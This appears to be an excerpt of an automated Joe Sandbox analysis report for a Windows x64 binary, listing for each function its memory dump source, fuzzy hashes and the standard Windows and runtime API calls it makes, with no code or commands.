                                                                            • Instruction ID: 755125a7804cd830c00a3e49c74438e15564727b3379a7af7b915582017b0745
                                                                            • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                            • Instruction Fuzzy Hash: 10219F33B1874187D7209F29E95096EB7A4FB88BC4B841135EB8D87B14EF39E425CB10
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                            • Instruction ID: 6f9b31daef059129bb76b71346d21868dcabfefc52b6a218e39d49e6465fce2c
                                                                            • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                            • Instruction Fuzzy Hash: 59E01A20B0474186EF647B709D89A79AB52AF88BC1FC15478C80E02392DE3DE42A8220
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: CALL
                                                                            • API String ID: 1385522511-4196123274
                                                                            • Opcode ID: 7df1f46bfd15c02889e12017a46acf8864a0367ddef3f259e13737cb86d507f2
                                                                            • Instruction ID: 1a7df31a5d8196908a5ec158b7bdf7f448e4c110f26e8ab4c04b7481f130187c
                                                                            • Opcode Fuzzy Hash: 7df1f46bfd15c02889e12017a46acf8864a0367ddef3f259e13737cb86d507f2
                                                                            • Instruction Fuzzy Hash: 99229A72B08642CAEB24EF75D441AACBBA1FB44BD8F804136CA4D57795DF78E466C320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 65ef234e1015258fa0aca62b7805f88a650c59163da287440373c9589af60f10
                                                                            • Instruction ID: 739fd53db1e949299e9e75caa9a704d089a24fbbd199670ec1425206c43700e6
                                                                            • Opcode Fuzzy Hash: 65ef234e1015258fa0aca62b7805f88a650c59163da287440373c9589af60f10
                                                                            • Instruction Fuzzy Hash: 2E419172E08642C2E734AF39E404B39BBA0EB457E8F844230DA6E0B6C9CF7DD4568750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressFreeProc
                                                                            • String ID:
                                                                            • API String ID: 2632591731-0
                                                                            • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                            • Instruction ID: ca7463a908dc76709b5d35b27a6b746307b1ffe8184b0a325ba7107b37bf91e0
                                                                            • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                            • Instruction Fuzzy Hash: 33417F62B14A1286EB24EF39D8407FC6BA0EB44BCCF844131EA4E47699DF3CD466C720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_
                                                                            • String ID:
                                                                            • API String ID: 1144537725-0
                                                                            • Opcode ID: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                            • Instruction ID: 97442e7029a4e74742b275e6f8a1d971cef7de31017809e2f5a7dc2f79f17e07
                                                                            • Opcode Fuzzy Hash: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                            • Instruction Fuzzy Hash: 15419F71A09B46C6E765AF29E4407A8BBA8FB48BD8F844035DE4D07749DF7CE162C720
                                                                            APIs
                                                                            • IsThemeActive.UXTHEME ref: 00007FF797833756
                                                                              • Part of subcall function 00007FF797859334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF797859348
                                                                              • Part of subcall function 00007FF7978336E8: SystemParametersInfoW.USER32 ref: 00007FF797833705
                                                                              • Part of subcall function 00007FF7978336E8: SystemParametersInfoW.USER32 ref: 00007FF797833725
                                                                              • Part of subcall function 00007FF7978337B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF797833785), ref: 00007FF7978337F2
                                                                              • Part of subcall function 00007FF7978337B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF797833785), ref: 00007FF797833807
                                                                              • Part of subcall function 00007FF7978337B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF797833785), ref: 00007FF79783388D
                                                                              • Part of subcall function 00007FF7978337B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF797833785), ref: 00007FF797833924
                                                                            • SystemParametersInfoW.USER32 ref: 00007FF797833797
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 4207566314-0
                                                                            • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                            • Instruction ID: bfec8d3393ff0b39aab3982dd7cb59e97881d0aee0640679bddc3664e9256d4c
                                                                            • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                            • Instruction Fuzzy Hash: B9014670E0C2438AF774BB79A804974FB61EF08390FC64035D40C876A2DE3DB4A68760
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 485612231-0
                                                                            • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                            • Instruction ID: e42c18321163f9c523010a7114cf726f8ef912267c309017df0b26a0df0aedca
                                                                            • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                            • Instruction Fuzzy Hash: F8E04F10F0990392FE34BBB2580C5749E959F447D0BC48034D80D86255EE2CA4674620
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast
                                                                            • String ID:
                                                                            • API String ID: 918212764-0
                                                                            • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                            • Instruction ID: 25f40a7b59877ba3c551b211dbea550ebd5f2035cdda70972f77f39575210222
                                                                            • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                            • Instruction Fuzzy Hash: 7C11D611F1C64641FEB4B734A59567C9A825F94BE4FC84134DA2F4A7D2CDACA8A38221
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID:
                                                                            • API String ID: 1385522511-0
                                                                            • Opcode ID: f93ec442a7ba0cc11a5443e7b35fed9f8b1ff32b547cd1dd2020b4df4ad6a075
                                                                            • Instruction ID: de3b6830c536651c25a3c78661c3ba0874bb29632884b954b9d5117dd003c3a9
                                                                            • Opcode Fuzzy Hash: f93ec442a7ba0cc11a5443e7b35fed9f8b1ff32b547cd1dd2020b4df4ad6a075
                                                                            • Instruction Fuzzy Hash: 5C32CF22E0C6828AEB70EB25D445AB9EB61FB84BC4FC54132DA1D07795DF7DE4638720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 556be1f2a6991f09f1900d7dfd60a126fc4b67ae0ab494afd9f4005c3dc32ae1
                                                                            • Instruction ID: 9a72ef42b419d43359debecb1e26e8ffd1aed061d6583ccdddd2be786fc55ccf
                                                                            • Opcode Fuzzy Hash: 556be1f2a6991f09f1900d7dfd60a126fc4b67ae0ab494afd9f4005c3dc32ae1
                                                                            • Instruction Fuzzy Hash: C5414D62B08A418AEB20EF75D4417ACABA1FB44BD8F844535CE0D57795CFBCE466C360
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                            • String ID:
                                                                            • API String ID: 3947729631-0
                                                                            • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                            • Instruction ID: 8ffebe47212a8871ac10b64535ce15627602838b9c831f2f63a5fddc4a5e4a1c
                                                                            • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                            • Instruction Fuzzy Hash: 4741BF21A0965386FA74FB35D850A78ABA2EF407E0FC54875DA0D076D1EF3DE8638360
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3215553584-0
                                                                            • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                            • Instruction ID: 5ca6a811d3f92cab75d658d3150b69ccb9011abc41bb5bc67581117b2ee2d9ff
                                                                            • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                            • Instruction Fuzzy Hash: 6E21B621A0CA8691EA71BF619401A7EDA61BF45BC4F94C030EA4C57B8ADF7CD9628760
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3215553584-0
                                                                            • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                            • Instruction ID: 12c1757d50ff30c4f93ae392eb2eaf6ed00ab94e0068a376dfa1e1fdc33ce0aa
                                                                            • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                            • Instruction Fuzzy Hash: 7121F37271864287D775AF34E484769AEA0AB80BD0F544234DA5ECA7D4DF2DC8628710
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                            • Instruction ID: 37e753826104901eaac73c4421b7ba64d75c9a63daed5d574a87ed3bbd9d8b3a
                                                                            • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                            • Instruction Fuzzy Hash: A4118C36B19A4581EB24AF26D09077CA760FB88FE0F945132DE1E077A1CF3CD4A28320
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                            • Instruction ID: 815d107c2b0178f1cf8cd9e0743d7a2f9728db9318487d33846ef4d305b7d8c5
                                                                            • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                            • Instruction Fuzzy Hash: 1711A77291CA4696DA25BF70D4096ADFB61EF90394FD04132E64E0A7D9DF7CE052CB20
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3215553584-0
                                                                            • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                            • Instruction ID: 5c2ff83645d75822fe93e96b90dbb15fd1e0a2eedfe1dac84c9897b1c48b96e4
                                                                            • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                            • Instruction Fuzzy Hash: 40017121E08A0761FD39BB759411F7D99505F847E8FA49230E92D4B2D6EE6CE8634230
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3215553584-0
                                                                            • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                            • Instruction ID: 8a53c13c05758b7708e1eba7416e3c69bcc1c6ae8c60707f741a99d0205c474a
                                                                            • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                            • Instruction Fuzzy Hash: 8DF0BB21A4C90361E93477757441E7DAE846F407D4FE49130F95D862DBDE6CD4738631
                                                                            APIs
                                                                              • Part of subcall function 00007FF797864970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF797864999
                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF79787C8FE), ref: 00007FF79783656F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3938577545-0
                                                                            • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                            • Instruction ID: 2bce3687860a89147876b8f5873d1395f53c50c5819ef2dc0c2e313413fb98e3
                                                                            • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                            • Instruction Fuzzy Hash: C3F03A92B09A05C2EF2DEF79C055B386A60BF58F88F540532CA0E8A189CF2CD4658261
                                                                            APIs
                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF797854C5C
                                                                              • Part of subcall function 00007FF797855600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF797855609
                                                                              • Part of subcall function 00007FF797855600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF79785561A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                            • String ID:
                                                                            • API String ID: 1680350287-0
